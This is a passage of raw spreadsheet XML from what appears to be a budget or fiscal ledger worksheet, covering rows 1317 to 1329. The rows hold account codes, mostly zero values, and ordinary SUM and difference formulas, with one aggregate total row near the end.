      <c r="AA1317" s="17"/>
      <c r="AB1317" s="17"/>
      <c r="AC1317" s="17"/>
      <c r="AD1317" s="17"/>
      <c r="AE1317" s="17">
        <f t="shared" ref="AE1317:AP1318" si="622">G1317-S1317</f>
        <v>0</v>
      </c>
      <c r="AF1317" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AG1317" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AH1317" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AI1317" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AJ1317" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AK1317" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AL1317" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AM1317" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AN1317" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AO1317" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AP1317" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
    </row>
    <row r="1318" ht="18" customHeight="1" spans="1:42">
      <c r="A1318" s="10"/>
      <c r="B1318" s="10"/>
      <c r="C1318" s="28"/>
      <c r="D1318" s="10">
        <v>23202</v>
      </c>
      <c r="E1318" s="11" t="s">
        <v>4020</v>
      </c>
      <c r="F1318" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1318" s="17"/>
      <c r="H1318" s="17"/>
      <c r="I1318" s="17"/>
      <c r="J1318" s="17"/>
      <c r="K1318" s="17"/>
      <c r="L1318" s="17"/>
      <c r="M1318" s="17"/>
      <c r="N1318" s="17"/>
      <c r="O1318" s="17"/>
      <c r="P1318" s="17"/>
      <c r="Q1318" s="17"/>
      <c r="R1318" s="17"/>
      <c r="S1318" s="17"/>
      <c r="T1318" s="17"/>
      <c r="U1318" s="17"/>
      <c r="V1318" s="17"/>
      <c r="W1318" s="17"/>
      <c r="X1318" s="17"/>
      <c r="Y1318" s="17"/>
      <c r="Z1318" s="17"/>
      <c r="AA1318" s="17"/>
      <c r="AB1318" s="17"/>
      <c r="AC1318" s="17"/>
      <c r="AD1318" s="17"/>
      <c r="AE1318" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AF1318" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AG1318" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AH1318" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AI1318" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AJ1318" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AK1318" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AL1318" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AM1318" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AN1318" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AO1318" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
      <c r="AP1318" s="17">
        <f t="shared" si="622"/>
        <v>0</v>
      </c>
    </row>
    <row r="1319" ht="18" customHeight="1" spans="1:42">
      <c r="A1319" s="10"/>
      <c r="B1319" s="10"/>
      <c r="C1319" s="28"/>
      <c r="D1319" s="10">
        <v>23203</v>
      </c>
      <c r="E1319" s="11" t="s">
        <v>4021</v>
      </c>
      <c r="F1319" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1319" s="12">
        <f t="shared" ref="G1319:R1319" si="623">SUM(G1320:G1323)</f>
        <v>0</v>
      </c>
      <c r="H1319" s="12">
        <f t="shared" si="623"/>
        <v>0</v>
      </c>
      <c r="I1319" s="12">
        <f t="shared" si="623"/>
        <v>0</v>
      </c>
      <c r="J1319" s="12">
        <f t="shared" si="623"/>
        <v>0</v>
      </c>
      <c r="K1319" s="12">
        <f t="shared" si="623"/>
        <v>0</v>
      </c>
      <c r="L1319" s="12">
        <f t="shared" si="623"/>
        <v>0</v>
      </c>
      <c r="M1319" s="12">
        <f t="shared" si="623"/>
        <v>0</v>
      </c>
      <c r="N1319" s="12">
        <f t="shared" si="623"/>
        <v>0</v>
      </c>
      <c r="O1319" s="12">
        <f t="shared" si="623"/>
        <v>0</v>
      </c>
      <c r="P1319" s="12">
        <f t="shared" si="623"/>
        <v>0</v>
      </c>
      <c r="Q1319" s="12">
        <f t="shared" si="623"/>
        <v>0</v>
      </c>
      <c r="R1319" s="12">
        <f t="shared" si="623"/>
        <v>0</v>
      </c>
      <c r="S1319" s="12">
        <v>0</v>
      </c>
      <c r="T1319" s="12">
        <v>0</v>
      </c>
      <c r="U1319" s="12">
        <v>0</v>
      </c>
      <c r="V1319" s="12">
        <v>0</v>
      </c>
      <c r="W1319" s="12">
        <v>0</v>
      </c>
      <c r="X1319" s="12">
        <v>0</v>
      </c>
      <c r="Y1319" s="12">
        <v>0</v>
      </c>
      <c r="Z1319" s="12">
        <v>0</v>
      </c>
      <c r="AA1319" s="12">
        <v>0</v>
      </c>
      <c r="AB1319" s="12">
        <v>0</v>
      </c>
      <c r="AC1319" s="12">
        <v>0</v>
      </c>
      <c r="AD1319" s="12">
        <v>0</v>
      </c>
      <c r="AE1319" s="12">
        <f t="shared" ref="AE1319:AP1319" si="624">SUM(AE1320:AE1323)</f>
        <v>0</v>
      </c>
      <c r="AF1319" s="12">
        <f t="shared" si="624"/>
        <v>0</v>
      </c>
      <c r="AG1319" s="12">
        <f t="shared" si="624"/>
        <v>0</v>
      </c>
      <c r="AH1319" s="12">
        <f t="shared" si="624"/>
        <v>0</v>
      </c>
      <c r="AI1319" s="12">
        <f t="shared" si="624"/>
        <v>0</v>
      </c>
      <c r="AJ1319" s="12">
        <f t="shared" si="624"/>
        <v>0</v>
      </c>
      <c r="AK1319" s="12">
        <f t="shared" si="624"/>
        <v>0</v>
      </c>
      <c r="AL1319" s="12">
        <f t="shared" si="624"/>
        <v>0</v>
      </c>
      <c r="AM1319" s="12">
        <f t="shared" si="624"/>
        <v>0</v>
      </c>
      <c r="AN1319" s="12">
        <f t="shared" si="624"/>
        <v>0</v>
      </c>
      <c r="AO1319" s="12">
        <f t="shared" si="624"/>
        <v>0</v>
      </c>
      <c r="AP1319" s="12">
        <f t="shared" si="624"/>
        <v>0</v>
      </c>
    </row>
    <row r="1320" ht="18" customHeight="1" spans="1:42">
      <c r="A1320" s="10"/>
      <c r="B1320" s="10"/>
      <c r="C1320" s="28"/>
      <c r="D1320" s="10">
        <v>2320301</v>
      </c>
      <c r="E1320" s="16" t="s">
        <v>4022</v>
      </c>
      <c r="F1320" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1320" s="17"/>
      <c r="H1320" s="17"/>
      <c r="I1320" s="17"/>
      <c r="J1320" s="17"/>
      <c r="K1320" s="17"/>
      <c r="L1320" s="17"/>
      <c r="M1320" s="17"/>
      <c r="N1320" s="17"/>
      <c r="O1320" s="17"/>
      <c r="P1320" s="17"/>
      <c r="Q1320" s="17"/>
      <c r="R1320" s="17"/>
      <c r="S1320" s="17"/>
      <c r="T1320" s="17"/>
      <c r="U1320" s="17"/>
      <c r="V1320" s="17"/>
      <c r="W1320" s="17"/>
      <c r="X1320" s="17"/>
      <c r="Y1320" s="17"/>
      <c r="Z1320" s="17"/>
      <c r="AA1320" s="17"/>
      <c r="AB1320" s="17"/>
      <c r="AC1320" s="17"/>
      <c r="AD1320" s="17"/>
      <c r="AE1320" s="17">
        <f t="shared" ref="AE1320:AP1323" si="625">G1320-S1320</f>
        <v>0</v>
      </c>
      <c r="AF1320" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AG1320" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AH1320" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AI1320" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AJ1320" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AK1320" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AL1320" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AM1320" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AN1320" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AO1320" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AP1320" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
    </row>
    <row r="1321" ht="18" customHeight="1" spans="1:42">
      <c r="A1321" s="10"/>
      <c r="B1321" s="10"/>
      <c r="C1321" s="28"/>
      <c r="D1321" s="10">
        <v>2320302</v>
      </c>
      <c r="E1321" s="16" t="s">
        <v>4023</v>
      </c>
      <c r="F1321" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1321" s="17"/>
      <c r="H1321" s="17"/>
      <c r="I1321" s="17"/>
      <c r="J1321" s="17"/>
      <c r="K1321" s="17"/>
      <c r="L1321" s="17"/>
      <c r="M1321" s="17"/>
      <c r="N1321" s="17"/>
      <c r="O1321" s="17"/>
      <c r="P1321" s="17"/>
      <c r="Q1321" s="17"/>
      <c r="R1321" s="17"/>
      <c r="S1321" s="17"/>
      <c r="T1321" s="17"/>
      <c r="U1321" s="17"/>
      <c r="V1321" s="17"/>
      <c r="W1321" s="17"/>
      <c r="X1321" s="17"/>
      <c r="Y1321" s="17"/>
      <c r="Z1321" s="17"/>
      <c r="AA1321" s="17"/>
      <c r="AB1321" s="17"/>
      <c r="AC1321" s="17"/>
      <c r="AD1321" s="17"/>
      <c r="AE1321" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AF1321" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AG1321" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AH1321" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AI1321" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AJ1321" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AK1321" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AL1321" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AM1321" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AN1321" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AO1321" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AP1321" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
    </row>
    <row r="1322" ht="18" customHeight="1" spans="1:42">
      <c r="A1322" s="10"/>
      <c r="B1322" s="10"/>
      <c r="C1322" s="28"/>
      <c r="D1322" s="10">
        <v>2320303</v>
      </c>
      <c r="E1322" s="16" t="s">
        <v>4024</v>
      </c>
      <c r="F1322" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1322" s="17"/>
      <c r="H1322" s="17"/>
      <c r="I1322" s="17"/>
      <c r="J1322" s="17"/>
      <c r="K1322" s="17"/>
      <c r="L1322" s="17"/>
      <c r="M1322" s="17"/>
      <c r="N1322" s="17"/>
      <c r="O1322" s="17"/>
      <c r="P1322" s="17"/>
      <c r="Q1322" s="17"/>
      <c r="R1322" s="17"/>
      <c r="S1322" s="17"/>
      <c r="T1322" s="17"/>
      <c r="U1322" s="17"/>
      <c r="V1322" s="17"/>
      <c r="W1322" s="17"/>
      <c r="X1322" s="17"/>
      <c r="Y1322" s="17"/>
      <c r="Z1322" s="17"/>
      <c r="AA1322" s="17"/>
      <c r="AB1322" s="17"/>
      <c r="AC1322" s="17"/>
      <c r="AD1322" s="17"/>
      <c r="AE1322" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AF1322" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AG1322" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AH1322" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AI1322" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AJ1322" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AK1322" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AL1322" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AM1322" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AN1322" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AO1322" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AP1322" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
    </row>
    <row r="1323" ht="18" customHeight="1" spans="1:42">
      <c r="A1323" s="10"/>
      <c r="B1323" s="10"/>
      <c r="C1323" s="28"/>
      <c r="D1323" s="10">
        <v>2320399</v>
      </c>
      <c r="E1323" s="16" t="s">
        <v>4025</v>
      </c>
      <c r="F1323" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1323" s="17"/>
      <c r="H1323" s="17"/>
      <c r="I1323" s="17"/>
      <c r="J1323" s="17"/>
      <c r="K1323" s="17"/>
      <c r="L1323" s="17"/>
      <c r="M1323" s="17"/>
      <c r="N1323" s="17"/>
      <c r="O1323" s="17"/>
      <c r="P1323" s="17"/>
      <c r="Q1323" s="17"/>
      <c r="R1323" s="17"/>
      <c r="S1323" s="17"/>
      <c r="T1323" s="17"/>
      <c r="U1323" s="17"/>
      <c r="V1323" s="17"/>
      <c r="W1323" s="17"/>
      <c r="X1323" s="17"/>
      <c r="Y1323" s="17"/>
      <c r="Z1323" s="17"/>
      <c r="AA1323" s="17"/>
      <c r="AB1323" s="17"/>
      <c r="AC1323" s="17"/>
      <c r="AD1323" s="17"/>
      <c r="AE1323" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AF1323" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AG1323" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AH1323" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AI1323" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AJ1323" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AK1323" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AL1323" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AM1323" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AN1323" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AO1323" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
      <c r="AP1323" s="17">
        <f t="shared" si="625"/>
        <v>0</v>
      </c>
    </row>
    <row r="1324" ht="18" customHeight="1" spans="1:42">
      <c r="A1324" s="10"/>
      <c r="B1324" s="10"/>
      <c r="C1324" s="28"/>
      <c r="D1324" s="10">
        <v>233</v>
      </c>
      <c r="E1324" s="11" t="s">
        <v>4026</v>
      </c>
      <c r="F1324" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1324" s="12">
        <f t="shared" ref="G1324:R1324" si="626">SUM(G1325:G1327)</f>
        <v>0</v>
      </c>
      <c r="H1324" s="12">
        <f t="shared" si="626"/>
        <v>0</v>
      </c>
      <c r="I1324" s="12">
        <f t="shared" si="626"/>
        <v>0</v>
      </c>
      <c r="J1324" s="12">
        <f t="shared" si="626"/>
        <v>0</v>
      </c>
      <c r="K1324" s="12">
        <f t="shared" si="626"/>
        <v>0</v>
      </c>
      <c r="L1324" s="12">
        <f t="shared" si="626"/>
        <v>0</v>
      </c>
      <c r="M1324" s="12">
        <f t="shared" si="626"/>
        <v>0</v>
      </c>
      <c r="N1324" s="12">
        <f t="shared" si="626"/>
        <v>0</v>
      </c>
      <c r="O1324" s="12">
        <f t="shared" si="626"/>
        <v>0</v>
      </c>
      <c r="P1324" s="12">
        <f t="shared" si="626"/>
        <v>0</v>
      </c>
      <c r="Q1324" s="12">
        <f t="shared" si="626"/>
        <v>0</v>
      </c>
      <c r="R1324" s="12">
        <f t="shared" si="626"/>
        <v>0</v>
      </c>
      <c r="S1324" s="12">
        <v>0</v>
      </c>
      <c r="T1324" s="12">
        <v>0</v>
      </c>
      <c r="U1324" s="12">
        <v>0</v>
      </c>
      <c r="V1324" s="12">
        <v>0</v>
      </c>
      <c r="W1324" s="12">
        <v>0</v>
      </c>
      <c r="X1324" s="12">
        <v>0</v>
      </c>
      <c r="Y1324" s="12">
        <v>0</v>
      </c>
      <c r="Z1324" s="12">
        <v>0</v>
      </c>
      <c r="AA1324" s="12">
        <v>0</v>
      </c>
      <c r="AB1324" s="12">
        <v>0</v>
      </c>
      <c r="AC1324" s="12">
        <v>0</v>
      </c>
      <c r="AD1324" s="12">
        <v>0</v>
      </c>
      <c r="AE1324" s="12">
        <f t="shared" ref="AE1324:AP1324" si="627">SUM(AE1325:AE1327)</f>
        <v>0</v>
      </c>
      <c r="AF1324" s="12">
        <f t="shared" si="627"/>
        <v>0</v>
      </c>
      <c r="AG1324" s="12">
        <f t="shared" si="627"/>
        <v>0</v>
      </c>
      <c r="AH1324" s="12">
        <f t="shared" si="627"/>
        <v>0</v>
      </c>
      <c r="AI1324" s="12">
        <f t="shared" si="627"/>
        <v>0</v>
      </c>
      <c r="AJ1324" s="12">
        <f t="shared" si="627"/>
        <v>0</v>
      </c>
      <c r="AK1324" s="12">
        <f t="shared" si="627"/>
        <v>0</v>
      </c>
      <c r="AL1324" s="12">
        <f t="shared" si="627"/>
        <v>0</v>
      </c>
      <c r="AM1324" s="12">
        <f t="shared" si="627"/>
        <v>0</v>
      </c>
      <c r="AN1324" s="12">
        <f t="shared" si="627"/>
        <v>0</v>
      </c>
      <c r="AO1324" s="12">
        <f t="shared" si="627"/>
        <v>0</v>
      </c>
      <c r="AP1324" s="12">
        <f t="shared" si="627"/>
        <v>0</v>
      </c>
    </row>
    <row r="1325" ht="18" customHeight="1" spans="1:42">
      <c r="A1325" s="10"/>
      <c r="B1325" s="10"/>
      <c r="C1325" s="28"/>
      <c r="D1325" s="10">
        <v>23301</v>
      </c>
      <c r="E1325" s="11" t="s">
        <v>4027</v>
      </c>
      <c r="F1325" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1325" s="17"/>
      <c r="H1325" s="17"/>
      <c r="I1325" s="17"/>
      <c r="J1325" s="17"/>
      <c r="K1325" s="17"/>
      <c r="L1325" s="17"/>
      <c r="M1325" s="17"/>
      <c r="N1325" s="17"/>
      <c r="O1325" s="17"/>
      <c r="P1325" s="17"/>
      <c r="Q1325" s="17"/>
      <c r="R1325" s="17"/>
      <c r="S1325" s="17"/>
      <c r="T1325" s="17"/>
      <c r="U1325" s="17"/>
      <c r="V1325" s="17"/>
      <c r="W1325" s="17"/>
      <c r="X1325" s="17"/>
      <c r="Y1325" s="17"/>
      <c r="Z1325" s="17"/>
      <c r="AA1325" s="17"/>
      <c r="AB1325" s="17"/>
      <c r="AC1325" s="17"/>
      <c r="AD1325" s="17"/>
      <c r="AE1325" s="17">
        <f t="shared" ref="AE1325:AP1327" si="628">G1325-S1325</f>
        <v>0</v>
      </c>
      <c r="AF1325" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AG1325" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AH1325" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AI1325" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AJ1325" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AK1325" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AL1325" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AM1325" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AN1325" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AO1325" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AP1325" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
    </row>
    <row r="1326" ht="18" customHeight="1" spans="1:42">
      <c r="A1326" s="10"/>
      <c r="B1326" s="10"/>
      <c r="C1326" s="34"/>
      <c r="D1326" s="10">
        <v>23302</v>
      </c>
      <c r="E1326" s="11" t="s">
        <v>4028</v>
      </c>
      <c r="F1326" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1326" s="17"/>
      <c r="H1326" s="17"/>
      <c r="I1326" s="17"/>
      <c r="J1326" s="17"/>
      <c r="K1326" s="17"/>
      <c r="L1326" s="17"/>
      <c r="M1326" s="17"/>
      <c r="N1326" s="17"/>
      <c r="O1326" s="17"/>
      <c r="P1326" s="17"/>
      <c r="Q1326" s="17"/>
      <c r="R1326" s="17"/>
      <c r="S1326" s="17"/>
      <c r="T1326" s="17"/>
      <c r="U1326" s="17"/>
      <c r="V1326" s="17"/>
      <c r="W1326" s="17"/>
      <c r="X1326" s="17"/>
      <c r="Y1326" s="17"/>
      <c r="Z1326" s="17"/>
      <c r="AA1326" s="17"/>
      <c r="AB1326" s="17"/>
      <c r="AC1326" s="17"/>
      <c r="AD1326" s="17"/>
      <c r="AE1326" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AF1326" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AG1326" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AH1326" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AI1326" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AJ1326" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AK1326" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AL1326" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AM1326" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AN1326" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AO1326" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AP1326" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
    </row>
    <row r="1327" ht="18" customHeight="1" spans="1:42">
      <c r="A1327" s="10"/>
      <c r="B1327" s="10"/>
      <c r="C1327" s="34"/>
      <c r="D1327" s="10">
        <v>23303</v>
      </c>
      <c r="E1327" s="11" t="s">
        <v>4029</v>
      </c>
      <c r="F1327" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1327" s="17"/>
      <c r="H1327" s="17"/>
      <c r="I1327" s="17"/>
      <c r="J1327" s="17"/>
      <c r="K1327" s="17"/>
      <c r="L1327" s="17"/>
      <c r="M1327" s="17"/>
      <c r="N1327" s="17"/>
      <c r="O1327" s="17"/>
      <c r="P1327" s="17"/>
      <c r="Q1327" s="17"/>
      <c r="R1327" s="17"/>
      <c r="S1327" s="17"/>
      <c r="T1327" s="17"/>
      <c r="U1327" s="17"/>
      <c r="V1327" s="17"/>
      <c r="W1327" s="17"/>
      <c r="X1327" s="17"/>
      <c r="Y1327" s="17"/>
      <c r="Z1327" s="17"/>
      <c r="AA1327" s="17"/>
      <c r="AB1327" s="17"/>
      <c r="AC1327" s="17"/>
      <c r="AD1327" s="17"/>
      <c r="AE1327" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AF1327" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AG1327" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AH1327" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AI1327" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AJ1327" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AK1327" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AL1327" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AM1327" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AN1327" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AO1327" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
      <c r="AP1327" s="17">
        <f t="shared" si="628"/>
        <v>0</v>
      </c>
    </row>
    <row r="1328" ht="18" customHeight="1" spans="1:42">
      <c r="A1328" s="10"/>
      <c r="B1328" s="10"/>
      <c r="C1328" s="34"/>
      <c r="D1328" s="7"/>
      <c r="E1328" s="35"/>
      <c r="F1328" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1328" s="36"/>
      <c r="H1328" s="36"/>
      <c r="I1328" s="36"/>
      <c r="J1328" s="36"/>
      <c r="K1328" s="36"/>
      <c r="L1328" s="36"/>
      <c r="M1328" s="36"/>
      <c r="N1328" s="36"/>
      <c r="O1328" s="36"/>
      <c r="P1328" s="36"/>
      <c r="Q1328" s="36"/>
      <c r="R1328" s="36"/>
      <c r="S1328" s="36"/>
      <c r="T1328" s="36"/>
      <c r="U1328" s="36"/>
      <c r="V1328" s="36"/>
      <c r="W1328" s="36"/>
      <c r="X1328" s="36"/>
      <c r="Y1328" s="36"/>
      <c r="Z1328" s="36"/>
      <c r="AA1328" s="36"/>
      <c r="AB1328" s="36"/>
      <c r="AC1328" s="36"/>
      <c r="AD1328" s="36"/>
      <c r="AE1328" s="36"/>
      <c r="AF1328" s="36"/>
      <c r="AG1328" s="36"/>
      <c r="AH1328" s="36"/>
      <c r="AI1328" s="36"/>
      <c r="AJ1328" s="36"/>
      <c r="AK1328" s="36"/>
      <c r="AL1328" s="36"/>
      <c r="AM1328" s="36"/>
      <c r="AN1328" s="36"/>
      <c r="AO1328" s="36"/>
      <c r="AP1328" s="36"/>
    </row>
    <row r="1329" ht="18" customHeight="1" spans="1:42">
      <c r="A1329" s="10"/>
      <c r="B1329" s="10"/>
      <c r="C1329" s="34"/>
      <c r="D1329" s="10"/>
      <c r="E1329" s="11" t="s">
        <v>4030</v>
      </c>
      <c r="F1329" s="14">
        <f t="shared" si="603"/>
        <v>672</v>
      </c>
      <c r="G1329" s="12">
        <f t="shared" ref="G1329:R1329" si="629">G1330+G1338+G1354+G1366+G1377+G1432+G1456+G1508+G1513+G1516+G1542+G1560+G1578</f>
        <v>27984</v>
      </c>
      <c r="H1329" s="12">
        <f t="shared" si="629"/>
        <v>1514</v>
      </c>
      <c r="I1329" s="12">
        <f t="shared" si="629"/>
        <v>0</v>
      </c>
      <c r="J1329" s="12">
        <f t="shared" si="629"/>
        <v>100</v>
      </c>
      <c r="K1329" s="12">
        <f t="shared" si="629"/>
        <v>327</v>
      </c>
      <c r="L1329" s="12">
        <f t="shared" si="629"/>
        <v>0</v>
      </c>
      <c r="M1329" s="12">
        <f t="shared" si="629"/>
        <v>0</v>
      </c>
      <c r="N1329" s="12">
        <f t="shared" si="629"/>
        <v>0</v>
      </c>
      <c r="O1329" s="12">
        <f t="shared" si="629"/>
        <v>245</v>
      </c>
      <c r="P1329" s="12">
        <f t="shared" si="629"/>
        <v>0</v>
      </c>
      <c r="Q1329" s="12">
        <f t="shared" si="629"/>
        <v>0</v>
      </c>
      <c r="R1329" s="12">
        <f t="shared" si="629"/>
        <v>0</v>
      </c>
      <c r="S1329" s="12">
        <v>29815</v>
      </c>
      <c r="T1329" s="12">
        <v>1514</v>
      </c>
      <c r="U1329" s="12">
        <v>0</v>
      </c>
      <c r="V1329" s="12">
        <v>100</v>
      </c>
      <c r="W1329" s="12">
        <v>327</v>
      </c>
      <c r="X1329" s="12">
        <v>0</v>
      </c>
      <c r="Y1329" s="12">
        <v>0</v>
      </c>
      <c r="Z1329" s="12">
        <v>0</v>
      </c>
      <c r="AA1329" s="12">
        <v>216</v>
      </c>
      <c r="AB1329" s="12">
        <v>0</v>
      </c>
      <c r="AC1329" s="12">
        <v>0</v>
      </c>
      <c r="AD1329" s="12">
        <v>0</v>
      </c>
      <c r="AE1329" s="12">
        <f t="shared" ref="AE1329:AP1329" si="630">AE1330+AE1338+AE1354+AE1366+AE1377+AE1432+AE1456+AE1508+AE1513+AE1516+AE1542+AE1560+AE1578</f>
        <v>-1831</v>
      </c>
      <c r="AF1329" s="12">
        <f t="shared" si="630"/>
        <v>0</v>
      </c>
      <c r="AG1329" s="12">
        <f t="shared" si="630"/>
        <v>0</v>
      </c>
      <c r="AH1329" s="12">
        <f t="shared" si="630"/>
        <v>0</v>
      </c>
      <c r="AI1329" s="12">
        <f t="shared" si="630"/>
        <v>0</v>
      </c>
      <c r="AJ1329" s="12">
        <f t="shared" si="630"/>
        <v>0</v>
      </c>
      <c r="AK1329" s="12">
        <f t="shared" si="630"/>
        <v>0</v>
